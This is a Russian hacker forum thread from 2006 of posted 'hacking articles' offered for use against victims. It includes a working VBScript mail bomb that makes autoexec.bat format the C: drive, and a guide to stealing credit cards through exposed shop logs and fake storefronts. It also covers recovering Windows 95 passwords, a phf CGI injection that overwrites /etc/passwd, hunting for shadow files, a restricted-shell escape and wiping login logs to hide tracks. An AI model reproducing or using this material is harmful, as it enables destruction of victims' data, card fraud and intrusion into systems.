On-line: гостей 0. Всего: 0 [подробнее..]
АвторСообщение
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:40. Заголовок: }{/\|{EPC|{ИE CТАТЬИ!!


Здесь будет всё о хакерстве!!

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Ответов - 25 , стр: 1 2 3 All [только новые]


Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:41. Заголовок: Re:


Почтовая бомба
Часто люди путаются между понятиями Spam и Mail-bomb. Spam - отправление на почтовый ящик огромного колличества сообщения (разбираются случае, когда отправить умышленно хочет наввредить человеку). Например: человек отправляет на почтовый ящик своего знакомого 5000 писем, при этом он его не "бомбит", а "спамит". Реально же почтовая бомба - это вредоносный скрипт, либо что-то другое, способное нанети вред информации, компьютеру и тд. Часто для написания вредоносных скриптов и почтовых червей используют Visual Basic Script.

Далее следует пример скрипта, который прописывает в autoexec.bat строчки для беззапросного форматирования винчестера и выключает компьютер. Создайте файл virus.html и внесите в него код скрипта:

<html>
<body>
<script language ="VBScript">
sub Reboot 'Процедурка перезагрузки
Set Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe User.exe,ExitWindows" 'Вызов WinApi с помощью
RunDll
end sub
sub destruct
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if fs.fileexists("c:\autoexec.bat") then 'Если у нас Autoexec существует
set ab=fs.getfile("c:\autoexec.bat") 'Возмём его
ab.attributes=0 'И поставим "нормальные" аттрибуты))
end if
set autoexec=fs.CreateTextFile("c:\autoexec.bat")'Пересоздадим Autoexec
'Далее запишем в него полезные комманды, их там явно не хватает!)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@echo Do not abort this process!"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.close 'Закроем Autoexec.bat
end sub
destruct 'Запишем в Autoexec комманду format
reboot
</script>
</body>
</html>

Пример будет форматировать диск "C:\". Пример элементарнейший, знающие VBS могут его значительно усовершенствовать.

Создание письба с бомбой. Откройте Outlook Express, создайте сообщение, впишите нужный почтовый адрес, в меню "Вставка" выберите 'Текст из файла...', после чего откройте файл "virus.html". Письмецо с бомбой готово!
По умолчанию Internet Explorer запрашивает подтверждение на запуск скрипта. Можно создать файл "virus.vbs" и внести непосредственно код скрипта. Вот и всё. Пока!

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:43. Заголовок: Re:


7 способов получения кредиток.
Если ты часто себя спрашиваешь :" Ну че за хрень, да где же эти кардеры берут номера кредиток. Значит, эта статья для тебя!

Способ 1. Этот способ основан на уязвимости в OnLine магазинах... Наверно многим хочется поиметь чужие кредитки, владельцы которых пользуются ими в он-лайн шопах. Ну что ж...у вас есть такая возможность! Для этого вам не придётся ухищряться, делая свой порносервер и что-либо ломать. Достаточно просто зайти какой-нибудь известный поисковик (я бы посоветовал тебе http://www.altavista.com/ или http://www.yahoo.com/, но можешь пользоваться и другим) и ввести пару волшебных слов. Какие именно?! Хмм...давайте посмотрим.
Многие админы оставляют открытыми такие директории:

/orders
/Order
/Orders
/order
/config
/Admin_files
/mall_log_files
/PDG_Cart
PDG_Cart/order.log
PDG_Cart/shopper.conf
/pw
/store/customers
/store/temp_customers
/WebShop
/webshop
/WebShop/templates
/WebShop/logs

В директориях подобного рода содержатся файлы типа:

orders.txt
order.txt
import.txt
checks.txt
order_log
order.log
orders.log
orders_log
log_order
log_orders
temp_order
temp_orders
order_temp
orders_temp
quikstore.cfg
quikstore.cgi
order_log_v12.dat
also order_log.dat
web_store.cgi
storemgr.pw
admin.pw
cc.txt
ck.log
shopper.conf
Так же нужно смотреть *.cfg, *.pw и *.olf файлы

Хех...вроде бы и всё, что нужно знать. Ложишь пальцы на клаву и нервно стучишь в поисковую строку нечто на подобие "Index of /orders.log" и жмёшь ENTER. Что дальше?! А дальше вам стоит просто терпение и перебор нужных ссылок...а потом проверка полученых кредиток. Вот так вот плохие люди (ака редиски) имеют ваши креды.

Способ 2. Делаем порносайт! Да-да именно порносайт. Идея в чем ? Много раз ты видел в сети кучу сайтов, которые предоставляют тебе доступ в каталог с порнушкой после того как ты заплатишь N-ую сумму по кредитке. Тебе влом делать такую пагу? Но ради сотен кредиток тебе стоит этим заняться, тем более что пага будет левая, те не надо заливать туды тысячи картинок. Делаем крутую начальную страницу, желательно на флеше и без фреймов(так юзеры любят, и страницу для бесплатного доступа(free trial), залив туда штук десяток крутейших качественных фоток, которые не нужно брать с таких известных и крупных сайтов как http://www.sex.com/, http://www.porno.com/, етц., потом заделываем регистрацию для получения от ламеров/юзеров номеров их кредиток и инфы, которая необходима для того чтобы эти бабки с креды слить. И делов то на 2 часа ! При этом слезно обещаешь юзверю, что пароль для доступа ты пришлешь через 2 часа, и вот тебе еще и мыло, которое ты можешь продать в большом количестве. Двойная выгода. Ясен перец, что пароль ты не пришлешь, но зато пришлешь уведомление о том, что сайт временно не работает!

И запомни фишку, не загибай цен, а креды проверяй для того чтобы знать, что юзер довольно половозрелое существо (то бишь совершеннолетний), так многие делают ! Надеюсь ты все уяснил? И запомни : НЕ ЖАДНИЧАЙ !

Способ 3. С помощью 2 способа ты получишь минимум кред. Порносайт плох тем, что вряд ли вам удастся создать что-то такое, на что народ бы валом попёр, т.к. то, что можно было придумать новаторское в этой области, давно придумано, да и народу, который на порносайты за деньги валит, сравнительно немного...и ламерков (юзеров, программеров, хакеров, системных администраторов - подчеркнуть нужное), которые пытаются денег нагрести, полно, а после публикации в "Хакере" количество оных, я думаю, увеличится ещё раз в 5-10 раз).
Чтобы выделиться на общем фоне, надо прибегать к-чёрт-знает-каким-напрягам, да и вообще подумай: надо ли тебе это?????

Есть идея получше: открыть свой е-магазин, без всяких шуток!.
Итак, фишка заключается в том, что можно предложить народу любые продукты (только не варенье и не тампаксы), по ценам ниже рыночных. Как это сделать? Да очень просто: мы только предлагаем, но ничего не продаём. Чувствую, что окончательно тебя запутал. Давайте приведу пример: создаём сайт по продаже супер-пупер-мега-дрюпер-компов по цене в 400 вечнозеленых (ну, ест-но, покупка по кредам, и тэдэ, и тэпэ), после некой рекламы про супер-низкие цены к нам приходит человек, и, видя данную картину, естественно желает прикупить парочку данных компов. Далее, он покупает их по креде, которая и приходит к нам на е-маил, а через дня два ему посылается письмецо с содержанием: Компания супермега компы Inc. крупно извиняется, но не может выполнить данную услугу в данный момент, или что-то в этом духе... И вот у вас креда в руках, творите что хотите, но особенно не зарывайтесь.
Так же можно продавать буржуям продукты питания, так как там, где солнце светит наглой мордой, покупки через интернет делают в основном домохозяйки.

Способ 4. Можно найти в Интернете список работающих кредиток. Где? Ну, например, на каком-нибудь сайте хакерской группы. Вроде, на http://www.carder.org/ хотят сделать такой раздел...

Способ 5. В больших супермаркетах принимают к оплате кредитные карты. После того, как покупатель прошел через кассу у него на руках остается чек и "Слип". Так вот многие люди просто выкидывают его в урну. Стоит поошиваться около мусорки и у тебя на руках остается почти настоящая кредитка. Кстати подходят только карточки Visa, MasterCard и AmericanExpress(aka Amex). (это обычно пишется на слипе.)

Способ 6. Попросить у друга-официанта незаметно переписать номер кредитки и дать/продать тебе.

Способ 7. Взломать какой-нибудь web-shop и скоприовать файл или лог с кредиками. Способ имеет большой недостаток. Необходимо быть крутым хакером, а этим наделены немногие.

Способ 8. Купить кредитку в банке (как сам понимаешь, отпадает в связи с тематикой данной статьи.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:45. Заголовок: Re:


10 методов взлома пароля
1) Попытайся залогиниться без пароля. Просто нажми <Enter>. Если это не работает, залогинься с паролем <пробел> <пробел>.

2) 5% компьютеров используют пароль такой же, как и логин. Например, если логин domain, значит ипароль тоже domain. Идиотизм, да? Попытайся залогиниться, используя логин такой же, как и пароль.

3) Примерно 35% компьютеров используют пароль, вторичный от логина. Обычно ты переберешь около 1000 комбинаций, чтобы найти правильный. Например, если логин JQPublic, попытайся Public, John, JohnQPub, и т.д.

4) В 3-ем варианте ты использовал грубый метод подбора пароля. Достань лучше академический словарь слов и имен. Там приблизительно около 30.000 возможных. Быстрая атака заложена в этом методе (приблизительно 800 слов/мин).

5) Сейчас попытайся использовать лист с английскими словами. Там где-то 150.000 слов таких, как оригинальные или известные имена стандартных слов, научные термины, другие языки и т.д.

6) Если это не сработает, время найти специалиста по этим делам. Используй национальный словарь и лист c образцами. Там около 2.500.000 комбинаций. Там есть все, даже игры! Но перебор займет очень много времени. Будь уверен, что ты используешь это не на перегруженном сервере. Если он будет медленным или перегруженным, ты будешь в глубокой жопе.

7) О боже, еще не заработало? Попытайся использовать тот же словарь, только с фильтром. Я имею ввиду, допустим, слово Secret может быть, как SeCrEt, Secr3t, и т.д. Тут больше 1.000.000.000 комбинаций.

8) Используй английский словарь с фильтрами. Похоже, как и в 7-ом методе, но со всеми анклийскими словами.

9) Еще не заработало??? Если ты проделал все выше описанные действия безрезультатно, то возможно ты имеешь дело с чем-то серьезным. Наверняка, система содержит чрезвычайно секретную информацию. Ты действительно хочешь продолжить? Возможно, ты уже в глубокой жопе, если не можешь получить доступа. Используй национальный словарь с фильтрами. Там более 250.000.000 комбинаций. Тебе потребуется около 18 часов, чтобы закончить этот метод. Работай, дружок, работай.

10) Используй специальную программку (такую, как Claymore). Она тупо подбирает всевозможные буквы, цыфры и друие символы. Никто еще не заканчивал это удачно (обламывало подбирать). Там более 205.000.000.000 возможных комбинаций. Если ты не хочешь заниматься этим, выбери другую мишень.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:46. Заголовок: Re:


К вопросу о бесплатном Интернете
Для начала небольшой экскурс в историю. Во все времена были люди, которые старались что-либо утаить от других. Hо были и другие: те, которые с этим были не согласны и поэтому всячески старались тайны первых узнать - такова уж человеческая сущность. И вот, придумали первые вход в Интернет с паролем, ибо денег стоит, а вторые сразу начали этот пароль отыскивать всеми возможными и невозможными способами.

Итак, стадия первая.

Были времена, когда пароль пользователь мог выбирать сам. Безусловно, с одной стороны, это было удобно: если сам слово это заветное придумал, то уж не забудешь никогда (если только пребывал в этот момент в здравом уме и твердой памяти, но это уже к делу не относится). Пароль же выбирался не просто так: для указанного пользователя он обычно нес определенную смысловую нагрузку. И в этом было слабое место данного метода.

Теперь только в дешевых фильмах увидишь некоего гражданина, копающегося в мусорной корзине своей будущей жертвы, в надежде узнать имена, фамилии, даты рождения всех родственников таковой вплоть до десятого колена, а также всех их собак, кошек, крыс, хомяков и прочей живности. И не без успеха!

А как же еще: а что вам, например, первым приходит на ум? - Конечно: имя вашей (или не вашей) подруги или кличка вашей собаки, ну, или слово какое, непотребное (но это уже от воспитания зависит)! Hаиболее продвинутые хакеры начали даже составлять специальные словари с учетом наиболее часто встречающихся в паролях слов.

Все это, в конце концов, положило конец первой стадии, и началась вторая: теперь пароль выдает компьютер, то есть генерирует некоторую псевдослучайную последовательность букв, цифр и разных знаков препинания. Хорошо-то как стало: 'tHa73?Lp' - поди-ка подбери! Hо тут возникла другая проблема: а поди-ка запомни!

Пользователи наши начали их на бумажках записывать, ну и периодически... правильно: бумажки терялись, похищались, попадали в мусорную корзину и т. д.- от чего ушли, к тому и пришли! И тогда какаято умная голова догадалась, что пароль можно хранить не в голове, а прямо на жестком диске.

В DialUp-окне галочку поставить и запомнить пароль. У компьютера мозги кремниевые - ему все равно, что запоминать. Hу, а раз запомнили, то, само собой, и записать надо. Hу, а раз записать, то... правильно: отвернулся наш пользователь, а тут хакеры толпой налетели - пароль подсматривать.

И тогда запомненные пароли стали шифровать...

Hу вот, наше лирико-историческое вступление закончилось.

Где хранятся пароли в Windows 95? Зашифрованные пароли в Windows 95, как известно, хранятся в основном каталоге, в файлах с расширением PWL. С учетом того, что не только <у нас здесь>, но и <у них там> бывают персональные компьютеры коллективного пользования, да и сети локальные местами встречаются, на каждого пользователя заводится свой PWL.

Кстати, название файла соответствует логину (имени... нет, скорее, кличке) данного пользователя.

Зашифрованы эти файлы, в принципе, достаточно прилично. Если кому-либо интересно, то, взяв в руки какой нибудь дизассемблер (HIEW, QVIEW), можно посмотреть процедуру шифрования.

Она находится в файле MSPWL32.DLL. В версии OSR2pus со смещением 488(hex).

Вот уж где накручено. Имеется счетчик (назовем его N) от нуля до <сколько надо>. Имеются три таблицы.
В соответствии со счетчиком N берется байт из первой таблицы (X). По смещению X+N, урезанному до 8 бит, из второй таблицы берется другой байт (Y). Затем по адресу X+Y, опять же урезанному до 8 бит, из третьей таблицы берется третий байт (Z).

После столь хитрых манипуляций командой XOR с байтом Z шифруется байт информации, после чего счетчик инкрементируется, и все повторяется сначала.

Как формируются таблицы? - Hе знаю (лень было выяснять).

Кстати, таблиц, на самом деле, может оказаться и две, и одна (используются несколько раз на разных этапах). Расшифровывается все это аналогично (и той же процедурой), 'ибо команда XOR обратима.

Если же у вас стоит какая-то другая версия Windows 95, то это дела не меняет. Hе знаю уж, в чьих нездоровых мозгах могла появиться мысль использовать для шифрования команду хог byte ptr [eax+ebp],cl.

Может, запутать хотели? Hо команда уникальна, такие команды в обычных программах еще поискать надо. Стало быть, ищем соответствующую ей комбинацию 30h, OCh, 28h - и все дела. Дальше - просто. Берем MSPWL32.DLL и со смещения 511 h (или там, где найдем) ставим 90h, 90h, 90h - команды NОР (пустая операция). И все, команда не выполняется!

Что при этом произойдет? Да ничего! Hичего страшного и даже не очень страшного. И даже никто ничего не заметит!!! Все останется как всегда, с одним лишь исключением: ВСЕ логины/пароли будут ВИДHЫ, так сказать, невооруженным глазом! Тут, правда, есть два неприятных момента.

Во-первых, во время работы Windows вам не удастся подобным образом надругаться над их
<святая святых>: писать в этот файл нельзя. Значит, придется перегружаться в режиме эмуляции MS-DOS, а это лишнее время, которого может не быть.

Во-вторых, а это еще хуже, вам надо будет стереть ВСЕ PWL'ы, иначе даже в Windows не пустят: а вот тут у законных пользователей могут возникнуть лишние вопросы и подозрения.

А можно проще? Без дизассемблеров и <насильственных действий>? Можно! И вот здесь я скажу то, за что (и за многое, увы, другое) Windows 95 иначе как MustDie по праву никто не называет.

Вы, наверное, думаете, что пароли расшифровываются только тогда, когда это надо, а затем <выжигаются> из памяти <каленым железом>? - Hу вот еще... Открытые пароли ПОСТОЯHHО хранятся в системе '- с момента ВХОДА в Windows данного пользователя и до момента его ВЫХОДА! Вот вам и безопасность.
Hо этого мало: они доступны ЛЮБЫМ приложениям через API Windows. И вот результат: появляется программа PWLVIEW, которая спокойно показывает вам <всю подноготную> вашей (или не вашей) машины. В том числе и DiaIUp, и сетевые пароли. Формат выдаваемой информации таков:

*Rna\1-e соединение\1-и логин 1-й пароль

*Rna\2-e соединение\2-й логин 2-й пароль и так далее.

Да, это все хорошо, но она работает в окне DOS, а это... унизительно: мелкий шрифт, белым по черному... А нет ли еще чего-нибудь, ближе и роднее? Есть. Есть еще одна штука, PEEPER называется. Эта идет еще дальше. Пароль, как вы можете заметить, не показывается, вместо него звездочки. Так вот: запускаем PEEPER, запускаем соединение, наводим мышь на звезды и в окне PEEPER видим... правильно, открытый пароль.

Вы скажете: у меня нет ни времени, ни возможности ковыряться в чужой машине. Hельзя ли стянуть у соседа этот самый PWL, а потом, дома, разобрать? Можно, только это вам ничего не даст: не будет он у вас работать. Вернее, он ОДИH не будет.

Hужно унести еще и USER.DAT. После чего дома <создать> User'a с именем из PWL, заменить свой USER.DAT на цельнотянутый и еще добавить в Windows тянутый PWL. После чего войти в Windows под соответствующим именем и... Дальше в игру вступает PWLVIEW.

Я все так и сделал, скажете вы, а вот тот User в Windows с паролем входил, а мне теперь не войти - пароля то я не знаю.

Что делать? - Hе беда! Есть способ проще! Уносим ТОЛЬКО USER.DAT! А теперь еще раз: Windows'95 - MustDie!

Как вам известно, кроме интерактивного доступа в Интернет, провайдеры предлагают еще и e-mail. Так вот, чтобы залезть в ваш почтовый ящик, в тот, что у вас на лестнице, нужен ключ (или лом). Чтобы залезть в ваш e-mail, нужен пароль (или виртуальный лом). И тут я скажу: ВСЕ ПОГОЛОВHО провайдеры в славном городе СанктПетербурге - MustDie! Пароль к РОРЗ-ящику всегда тот же, что и DiaIUp!

Hу и что? - А вот что Пароль e-mail находится не B'PWL'e, а в USER.DAT,и зашифрован он не так сильно, вернее, почти совсем не зашифрован!

А это как? - А вот как! Метод <шифрования> напоминает UUE-кодирование, иначе говоря, из трех байтов делают четыре или из восьми битов - десять. Весь исходный пароль разбивается на части по три байта. В результирующей строке на один символ отводится 10 битов. Теперь: к каждому байту исходной строки прибавляется 30h, если сумма больше, чем 7Ah, то он становится равен 30h, а к паре 9 и 10 битов добавляется единица. Однако есть исключения.

Если общая длина строки пароля не кратна трем, то она дополняется байтами 3Dh. Судя по всему, это ODh (конец строки)+30(1. В конце строки ODh, OAh: стандартное завершение.

Hа мой взгляд, подобрать пароль вручную проще, чем написать соответствующую программу: не каждый же день вы эти пароли подбираете! Где находится пароль - см. ниже, оттуда его и берем.

А принцип прост: запускаем Internet Mail, заходим в Сообщение -> Параметры -> Сервер. Запускаем REGEDIT переходим в .Software -> Microsoft -> InternetMail and News -> Mail -> POP3 -> <Ваш сервер>: смотрим Password. (*) Удаляем пароль в Internet Mail. Первый подбираемый символ влияет на первый и второй байты, второй - на второй и третий, третий - на третий и четвертый. Теперь: подбираем символ так, чтобы первый байт совпал с оригиналом, а второй или совпал, или был самый большой, но меньше оригинала.

Аналогично для второго и третьего символов. С подбором третьего символа все четыре байта должны совпасть! Если нет - извините, вы ошиблись. Естественно, после каждой замены символа нажимаем <Применить>. Результат контролируем REGEDIT'OM, переходя выше/ ниже для обновления информации.

Когда первые три символа подобраны, возвращаемся к (*) для следующих трех, и т.д. до конца. Разумеется, байт(ы) 3Dh подбирать не нужно! После некоторой тренировки на все это уходит меньше 15 минут.

А где это счастье хранится? И, кстати, ведь кроме логика и пароля еще многое нужно знать, а откуда, не звонить же провайдеру? - Hе надо никому звонить! Все в нем, в USER.DAT.

HKEY_CURRENT_USER -> RemoteAccess -> Addresses: и мы имеем список подключений. Да, нотам ничего не понятно, цифирь...

Правильно! Выбираем байт, которого больше всего, и дешифруем им все остальные (обычный ХОR). В результате в куче всякой ерунды получаем ASCII-строку с номером модемного телефона провайдера.

HKEY_CURRENT_USER -> RemoteAccess -> Profile -> 'подключение' -> IP: со смещения OCh четыре байта задом наперед первичный DNS, затем еще четыре - вторичный, и т. д.

HKEY_CURRENT_USER-> RemoteAccess-> Profile -> 'подключение' -> User: логин.

HKEY_CURRENT_USER -> Software -> Microsoft -> Windows -> CurrentVersion -> InternetSettings -> ProxyServer: Proxy-сервер и порт.

HKEY_CURRENT_USER -> Software -> Microsoft -> Internet

Mail and News -> Mail:

-> DefaultPOP3Server:
-> DefaultSMTPServer:
-> SenderEMail:
-> Name:
-> Organization: это все и так понятно.
-> POP3 -r <РОРЗ-сервер>:
-> Account: это понятно.->
-> Password: ну вот и он, родимый.

А что делать, если пользователь - мазохист? Hе хранит пароли в компьютере, а вводит их каждый раз с клавиатуры? - И этому горю можно помочь. Существуют программы типа SPYWIN или HOOKDUMP. Они записывают все действия, производимые на компьютере. Достаточно подсадить одну из них и... если вам потом не лень будет разбирать те десятки килобайт, которые будут порождены этими шпионами. Естественно, их можно использовать и длядругих целей.

В заключение (да минует меня чаша сия!) могу сказать следующее: не берите и уж тем более не запускайте у себя всякие <крякеры Интернета>, почерпнутые с BBS и из FIDO. Они могут <крякнуть> только информацию на вашем винчестере! Ибо тот, кто может взломать провайдера, никогда не будет распыляться на такую мелочь, а другие в лучшем случае могут подбирать пароли по словарю, а это бесполезно, в худшем - над вами просто хотят посмеяться или, того хуже, сделать вам гадость (прецеденты уже были).

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:47. Заголовок: Re:


Взлом сайтов
Внимание:Перед тем как начать что-либо ломать - зайдите на www.cyberpolice.ru. Я не несу никакой ответственности за Вас, если вас поймают.

Существует несколько способов взлома WWW сайтов: используя Unix, используя браузеры и т.п. Поскольку не у всех есть Unix, то я опишу несколько способов взлома серверов, используя обычный браузер.

Взлом, используя браузер, заключается в получении файла passwd из каталога /etc. Либо в удалении всего (или части), что имеется на сайте. :) Когда вы получите passwd и расшифруете его, то дальше уже надо будет работать с telnet'ом и использовать exploits. Но это не в этой статье

Следующий способ - разновидность первого. Если вы обнаружили, что у вас права root, то можно просто взять passwd и добавить последней строчкой ваш логин, с правами Root. И потом залить его через FTP в любой каталог (пусть это будет income). Далее в браузере с помощью ls ищем полный путь к этому каталогу (допустим он /home/local/ftp/income). Тогда пишем www.hackzone.ru/cgi-bin/phf?Qalias=x%0a/bin/cp%20/
home/local/ftp/income/passwd%20/etc/passwd Т.е. мы скопировали наш passwd, на уже существующий! Теперь у нас есть права Root!!!

Следующий способ более сложный. Он заключается в том, чтобы выявить у CGI скриптов уязвимые места, и использовать их для получения passwd. Т.е. надо сделать так, чтобы скрипт начал выполнять вашу команду (cat, ls, rm...). Например на сервере есть скрипт, который отсылает сообщение кому-либо с помощью команды mail (эта команда позволяет выполнять другие команды!). Тогда в теле письма достаточно вставить ;cat /etc/passwd и вы увидите passwd, если скрипт не проверяет наличие таких символов как ;>|<и т.п., то все будет OK! Тоже самое позволяет делать команда finger.
Для начала думаю пока хватит.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:47. Заголовок: Re:


Что такое Nuke
Словом Nuke (нюк) называют сегодня любую атаку на порты удаленных компьютеров, приводящую к краху операционной системы или разрыву интернет-соединения. Nuke не нарушает состояние файловой системы и не рушит "железо" компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так как могла работать только на UNIX системах с правами root. Идея nuke.c заключалась в том, что она отсылала неправильные (invalid) ICMP пакеты, и машина-хост теряла связь.

В январе 1997 появилась атака под названием Ping o' Death, и 18 распространенных операционных систем оказались к ней весьма чувствительны. Ping o' Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата - полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).

7 июня 1997 г. некто по имени "_eci" впервые опубликовал в Сети исходный код реализующей ее программы.
В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился "залатать дыры" своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.

В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.

В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением -- программные заплатки, справлявшиеся с SSPing, оказались бессильны.

Январь 1998 года. Bonk и Bonik - модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в "группу риска" пользователи так и не удосужились эту "заплатку" установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.
Часто атаки комбинируются. Например, Land & IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing - подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:48. Заголовок: Re:


Ломаем провайдера
И как же нам его сломать?

Статья, пpедлагаемая вашему вниманию, может оказаться полезной только в том случае, если ваш пpовайдеp использует опеpационную систему UNIX, имеющую shell-доступ.

Если у вас нет UNIX-shell'a в сеpвеp пpовайдеpа, вы можете официально купить его или подобpать (только на слабо защищенных системах) паpоль (UNIX/UNIX; ROOT/ROOT; ADMIN/ADMIN; SHELL/SHELL; GUEST/GUEST и т.д.). Hа любом UNIXe (если не используется система специальной защиты) файл с паpолями находится в диpектоpии etc, в файле passwd. Файл, конечно, зашифpован и пpогpаммы для его обpатного декодиpования пpосто не существует, но есть дpугая возможность:
Кодиpовать слова (возможные паpоли) и сpавнивать получившийся кодиpованный ваpиант со всеми зашифpованными паpолями в файле passwd. Хакеpы создали пpогpаммы, делающие это автоматически, но для полноценной pаботы вам понадобится довольно быстpый компьютеp и хоpоший словаpь с возможными паpолями. Hа моей памяти самый полный словаpь занимал 10 мегабайт дискового пpостpанства и помог вскpыть более 200 паpолей пользователей известного pоссийского пpовайдеpа. Из всего, что я встpечал, самая лучшая пpогpамма для дешифpации паpоля под UNIX была Crack Алека Муфетта, а под DOS - CrackerJack.

Hекотоpые пpовайдеpы используют систему скpытия паpолей, в этом случае вместо шифpованного паpоля можно будет увидеть что-то наподобии *, а настоящие шифpованные паpоли находятся в дpугом месте. Если вы имеете дело с таким пpовайдеpом, не pасстpаивайтесь, у вас все pавно есть шанс стать обладателем десяточка паpолей пользователей. Для начала попpобуйте поискать спpятанный файл с паpолями в следующих местах:

/etc/security/passwd
/tcb/auth/files/
<first letter of username>/<username>
/tcb/files/auth/?/
/etc/master.passwd
/etc/shadpw
/etc/shadow
/etc/tcb/aa/user/
/.secure/etc/passwd
/etc/passwd[.dir|.pag]
/etc/security/passwd.adjunct
##username
/etc/shadow
<optional NIS+ private secure maps/tables/whatever>
/etc/shadow
/etc/security/* database
/etc/auth[.dir|.pag]
/etc/udb

Hо может быть и так, что нужного pезультата от поиска в этих диpектоpиях вы не добьетесь. Тогда вам пpидется воспользоваться специально написанной пpогpаммой для отлова файла с паpолями. Эта пpогpамма, котоpая pаботает на многих системах (хотя не на всех). Пpогpамма называется getpwent (), ее исходник можно найти на сеpвеpе (www.spider.ru) в pубpике "ХАКЕРЫ". Еще одна возможная непpиятность связанная с дешифpацией файла с паpолями может случится тогда, когда вы откpоете файл passwd и увидите там что-то похожее на: +::0:0:::. Это говоpит о том, что в системе использована система NIS(Network Information Server)/YP (Yelow Pages). Если у вас возникла такая пpоблема, то вам будет необходимо воспользоваться командой "ypcat passwd" для пpосмотpа настоящего файла с паpолями. Если вам пpидется доставать файл с паpолями под VMS, то попpобуйте посмотpеть SYS$SYSTEM:SYSUAF.DAT. Для взлома паpолей под VMS вам надо воспользоваться пpогpаммой CHECK_PASSWORD или GUESS_PASSWORD, а если у вас есть навыки пpогpаммиpования, то вам будет не сложно написать пpогpамму, котоpая будет сpавнивать кодиpованные слова из вашего словаpя с паpолями из файла.

Иногда для взлома пpовайдеpа тpебуется взломать огpаниченный shell-доступ. Для этого вам следует запустить пpогpамму vi и использовать эту команду: set shell=/bin/sh, после чего shell использует следующую команду :shell. И так, если вам удалось выудить несколько паpолей пользователей из passwd, то вам следует "замести следы". Это делается довольно пpосто, вам надо будет отpедактиpовать файлы /etc/utmp, /usr/adm/wtmp, /usr/adm/lastlog. Пpавда эти файлы написаны не откpытым текстом и pуками пpи помощи vi отpедактиpовать вам его не получится, пpидется воспользоваться специальной пpогpаммой, исходник котоpой вы можете найти на сеpвеpе www.spider.ru в pубpике "ХАКЕРЫ".

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:49. Заголовок: Re:


Натягиваем провайдера
